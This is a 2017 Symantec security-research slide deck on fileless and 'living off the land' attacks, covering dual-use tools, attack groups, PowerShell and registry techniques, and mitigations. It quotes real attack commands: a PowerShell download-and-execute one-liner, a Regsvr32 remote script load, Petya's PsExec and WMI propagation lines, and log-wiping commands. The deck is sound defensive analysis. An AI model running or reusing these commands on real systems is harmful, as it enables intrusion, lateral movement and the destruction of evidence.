Upload
symantec-security-response
View
1.571
Download
0
Embed Size (px)
Citation preview
2Copyright © 2017 Symantec Corporation
Definition: Living off the land
Only pre-installed software is used by the attacker and no additional binary executables are installed onto the system
Living off the land
2
3Copyright © 2017 Symantec Corporation
Attackers are using what’s already available to attack youo Less new files on disk → more difficult to detect attack
o Use off-the-shelf tools & cloud services → difficult to determine intent & source
o These tools are ubiquitous → hide in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
→ use simple and proven methods such as email & social engineering
Living off the land
3
4Copyright © 2017 Symantec Corporation
Multiple fileless methods possible - not all are truly fileless:
«Fileless» attacks
e.g. remote code exploits such as EternalBlue and CodeRedMEMORY ONLY ATTACKS
FILELESS LOADPOINT
NON-PE FILES
DUAL-USE TOOLS
Documents with macros, PDFs with JavaScript
and scripts (VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things
5Copyright © 2017 Symantec Corporation
Living off the land attack chain
Exploit in memorye.g. SMB EternalBlue
Email with Non-PE filee.g. document macro
Weak or stolen credentialse.g. RDP password guess
INCURSION
Remote script dropper e.g. LNK with PowerShell from cloud
1.
Memory only malwaree.g. SQL Slammer
Non-persistent
Persistent
PERSISTENCE
Fileless persistence loadpointe.g. JScript in registry
Regular non-fileless method
2.
PAYLOAD
Regular non-fileless payload
Non-PE file payloade.g. PowerShell script
Memory only payloade.g. Mirai DDoS
Dual-use toolse.g. netsh or PsExec.exe
3.
7Copyright © 2017 Symantec Corporation
Run malicious code only in memory, does not write any files to disk
o Mainly remote code execution (RCE) exploits, like EternalBlue
o CodeRed in 2001 was the first widespread outbreak of this type
o A computer restart will clean/disinfect
o PowerShell can be used to load and execute payload in memory
Attackers do not always need persistence:
o Mirai bot – re-infects device through a restart if it gets cleaned
o Targeted attack groups – core systems do not get restarted often
Memory only attacks
9Copyright © 2017 Symantec Corporation
System tools and clean applications used for nefarious purposes Some tools are pre-installed, some are downloaded by the attacker
Dual-use tools
Type of internal activity Purpose Dual-use tools
Internal network
reconnaissance
Enumerate information about a target
environment
net user, systeminfo, whoami,
hostname, quser, ipconfig
Credential harvesting
Obtain legitimate user credentials to gain
access to target systems for malicious
purposes
Mimikatz, WCE, pwdump
Lateral movement Gain deeper access into target network PsExec, PowerShell, WMI, RDP
Data exfiltration Send data back to attackersFTP, RAR, ZIP, iExplorer, PuTTY,
PowerShell, rdpclip
Fallback backdoorEnables a backdoor that can be used,
should the main backdoor be removednet user, RDP, Telnet server
10Copyright © 2017 Symantec Corporation
o Many attack groups use common system tools during their attacks
Information gathering
• systeminfo
• net view
• net view /domain
• tasklist /v
• gpresult /z
• arp -a
• net share
• net use
• net user administrator
• net user /domain
• net user administrator /domain
• tasklist /fi
WATERBUG/TURLA
• hostname
• whoami
• ver
• ipconfig -all
• ping www.google.com
• query user
• net user
• net view
• net view /domain
• tasklist /svc
• netstat -ano | find \TCP\
• msdtc [IP] [port]
APPLEWORM/LAZARUS
• net user
• ipconfig /all
• net start
• systeminfo
• gpresult
BILLBUG
11Copyright © 2017 Symantec Corporation
Group name Reconnaissance Credential harvesting Lateral movementCustom
built tools
Tick whoami, procdump, VBS WCE, Mimikatz, gsecdump PsExec Yes
Waterbug systeminfo, net, tasklist, gpresult,… WCE, pwdump Open shares Yes
Suckfly tcpscan, smbscan WCE, gsecdump, credentialdumper - Yes
Fritillary PowerShell, sdelete Mimikatz, PowerShell PsExec Yes
Destroyer Disk usage, event log viewer kerberos manipulator PsExec, curl, VNC Yes
Chafer network scanner, SMB bruteforcer WCE, Mimikatz, gsecdump,… PsExec Yes
Greenbug Broutlook WCE, gsecdump, browdump, … TeamViewer, PuTTY Yes
Buckeye os info, user info, smb enumerator,… pwdump, Lazagne, chromedump,… Open shares Yes
Billbugver, net, gpresult, systeminfo,
ipconfig, …- custom backdoor Yes
Appleworm net, netsh, query, telnet, find, … dumping SAM RDP bruteforcer, rdclip Yes
Targeted attacks & dual-use tools
12Copyright © 2017 Symantec Corporation
o 10 out of 10 of groups analyzed used system tools in combination with custom tools during their attacks
o Application whitelisting often does not protect against such attacks
Examples:
o Petya used PsExec, WMI, and LSAdump for lateral movement
o Calcium/Fin7 group used PowerShell payloads in attacks in 2017
o Attack against DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method
Targeted attack groups
13Copyright © 2017 Symantec Corporation
o Mimikatz and PsExec are popular for lateral movement, e.g. Petya
Dual-use tools
Global
usage
15Copyright © 2017 Symantec Corporation
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o \\[server_name]\admin$\perfc.dat
o psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
o Uses WMI to propagate if PsExec fails
o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create “%System%\rundll32.exe \“%Windows%\perfc.dat\" #1 60”
o Scheduled task to restart into the malicious MBR payload
o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%\shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traceso wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools
16Copyright © 2017 Symantec Corporation
The Odinaff group used multiple dual-use tools in their attack
o Mimikatz: An open source password recovery tool
o PsExec: A process execution tool from Microsoft
o Netscan: A network scanning tool
o Ammyy Admin: A remote access tool
o Gussdoor: A custom remote backdoor (Backdoor.Gussdoor)
o RunAs: A tool for running processes as another user
o PowerShell: Various commands used
Example: Odinaff group
17Copyright © 2017 Symantec Corporation
o On average 2% of malware in our sandbox misused WMI
WMI usage in malware
18Copyright © 2017 Symantec Corporation
Usage of dual-use tools - January 2017
Tool Usage count
sc.exe 2.7190%
vnc 2.1176%
net.exe 1.2733%
powershell.exe 1.0263%
ipconfig.exe 0.8227%
netsh.exe 0.7526%
teamviewer.exe 0.6224%
tasklist.exe 0.4963%
rdpclip.exe 0.3226%
rar.exe 0.3139%
Tool Usage count
wmic.exe 0.3027%
find.exe 0.2767%
curl.exe 0.2027%
netstat.exe 0.1938%
systeminfo.exe 0.1641%
wget.exe 0.1208%
nc.exe 0.1174%
gpresult.exe 0.1147%
whoami.exe 0.1109%
ammyy.exe 0.1061%
o System tools are popular with administrators and cyber criminals
o Remote administration tools are often misused by attackers
19Copyright © 2017 Symantec Corporation
o PowerShell is still gaining popularity with attackers
Usage of dual-use tools
21Copyright © 2017 Symantec Corporation
Malicious macro with social engineering
Malcious documents still popular
21
Embedded binary can be double clicked
22Copyright © 2017 Symantec Corporation
o Scripts are very popular, especially PowerShell
o Many script toolkits available
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be quickly adapted if needed
Non-PE files
powershell.exe -nop -ep Bypass -noexit -c
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};
iex ((New-Object System.Net.WebClient).DownloadString(‘[REMOVED]’))
Example PowerShell downloader
23Copyright © 2017 Symantec Corporation
Common malware use cases for PowerShell
23
PowerShell script used to download payload to disk or memory
Often used in email attachments such as WSF or document macros
DOWNLOADER
PowerShell script used as persistent loadpoint on Windows
Often stored completely in registry (fileless) e.g. Kotver or within WMI
LOADPOINT
PowerShell script remoting to execute on remote computer (Invoke-Command)
Download and execute Mimikatz, etc. in order to steal credentials
LATERAL MOVEMENT
24Copyright © 2017 Symantec Corporation
Email script downloaders
24
Detections by month for JavaScript and macro downloaders
25Copyright © 2017 Symantec Corporation
o Malicious attachments with HTML code gained popularity in 2017
Attachment file extensions
26Copyright © 2017 Symantec Corporation
Prevalence of PowerShello 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
26
Volume of PowerShell samples from customers in our sandbox in 2016
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
TOP 3 THREATS THAT USE POWERSHELL
28Copyright © 2017 Symantec Corporation
There are many ways to have a loadpoint without adding a new file:
o Windows registry
o Windows Management Instrumentation (WMI)
o Group Policies Objects (GPO)
o Scheduled task
o …
Fileless loadpoints
29Copyright © 2017 Symantec Corporation
Common: Windows registry run key that points to the malware binary file
New trick: Windows registry run key contains a script that will get executed
o This script can load more payloads from other registry keys and run them
o As the script is not in a file on disk it might be missed by traditional security tools
Script embedded in the registry
30Copyright © 2017 Symantec Corporation
o Multiple stages in registry
o Uses JavaScript and PowerShell
o Loads DLL directly into memory
o Decrypted directly in memory
o Uses non printable ASCII character to protect own registry key
Example: Poweliks
31Copyright © 2017 Symantec Corporation
o Registry run key can also point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Example: Downloder.Dromedan (40,000 detections / day)
o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores encoded DLL in the registry for later
Remote SCT load
Malicious.sct file
32Copyright © 2017 Symantec Corporation
Similar trigger methods exist for:
o Windows Management Instrumentation (WMI)
o Group Policies Objects (GPO)
o Scheduled task
Fileless loadpoints
WMI PowerShell backdoor
33Copyright © 2017 Symantec Corporation
Without additional files, but writing to existing files
o File infector Infect any file that gets restarted with the PC
o Browser files Infect the core browser files or extensions
o PowerShell profile Add malicious script to profile file
o Trigger on shutdown Remove itself once started and write registry run key when system shutdown is called
o BITSadmin Add a malicious update server as backdoor
Not truly fileless loadpoints
34Copyright © 2017 Symantec Corporation
If no file is written to disk → security measures might not work
Lack of indicators of compromise (IoCs) for sharing
Common malware does not always use a loadpoint anymore
Symantec has various detection features in place for such threats
Detection challenges
35Copyright © 2017 Symantec Corporation
o Monitor the use of dual-use tools inside your network
o Block remote execution through PsExec and WMI (if applicable)
o Enable better logging and process the information (if applicable)
o Enable advanced account security features, like 2FA and login notification (if applicable)
o Protect against password and credential theft, for example, with behavior based security solutions
Mitigation & best practices
36Copyright © 2017 Symantec Corporation
• Deepsight IoC feeds
• MATI custom reports
• Threat Intelligence
• Managed Security Services (MSS)
• Incident Response (IR) on site
• Data Loss Prevention (DLP)
• …
• Proxy SG secure web gateway
• Security Analytics
• Web Security Service
• Data Center Security (DCS)
• Control Compliance Suite (CCS)
…
Protection solutions
Symantec Endpoint Protection(SEP) 14
Reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …
• Public awareness/white papers
• Law enforcement collaboration
• Infrastructure takedowns
• …
• Email Security.cloud
• MAA Sandbox
• Advanced Threat Protection(ATP)
• …
Attacker
Organization
Users
37Copyright © 2017 Symantec Corporation
Advanced Antivirus Engine o Symantec uses an array of detection engines including an advanced
signature-based antivirus engine with heuristics, just-in-time (JIT) memory-
scanning, emulator and advanced machine-learning engines. This allows
for the detection of directly in-memory executed fileless threats.
SONAR Behavior Engineo SONAR is Symantec’s real-time behavior-based protection that blocks
potentially malicious applications from running on the computer. It detects
malware without requiring any specific detection signatures. SONAR uses
heuristics, reputation data, and behavioral policies to detect emerging and
unknown threats.
Email Protectiono Email-filtering services such as Symantec Email Security.cloud can block
malicious emails before they reach users. Symantec Messaging Gateway’s
Disarm Technology can also protect by removing malicious content before
they even reach the user.
Malware Analysis Sandboxo Sandboxes such as Blue Coat Malware Analysis have the capability to
analyze and block malicious scripts including PowerShell scripts.
The technology can overcome multiple layers of obfuscation to detect
deeply hidden suspicious behavior.
Network Protection
o Symantec’s Secure Web Gateway and IPS and firewall on the endpoint can
monitor and block malicious traffic entering or leaving a system and can
help minimizing impacts of attacks. Suspicious content can be
automatically analyzed on sandboxes.
System Hardeningo Symantec’s system hardening solution, Symantec Data Center Security,
can secure physical and virtual servers, and monitor the compliance
posture of server systems for on-premise, public, and private cloud data
centers. By defining allowed behavior, Symantec Data Center Security can
limit the use of scripts and any of their actions.
Visibility and Serviceso Symantec’s Managed Security Services can help with threat intelligtence,
with proactive threat hunting, as well as incident response handling.
Symantec: Robust protection against fileless threats
37
38Copyright © 2017 Symantec Corporation
o Nearly all targeted attack groups use system tools in their attacks
o Sandboxes are often not able to handle fileless attacks properly
o Fileless attacks are difficult to detect as they leave less traces
o Application whitelisting will not protect against all living off the land tactics
o Script attacks, especially PowerShell, are increasing
Conclusion
39Copyright © 2017 Symantec Corporation
o BLOG: Attackers are increasingly living off the land
o WHITEPAPER: Living off the land and fileless attack techniques
Further reading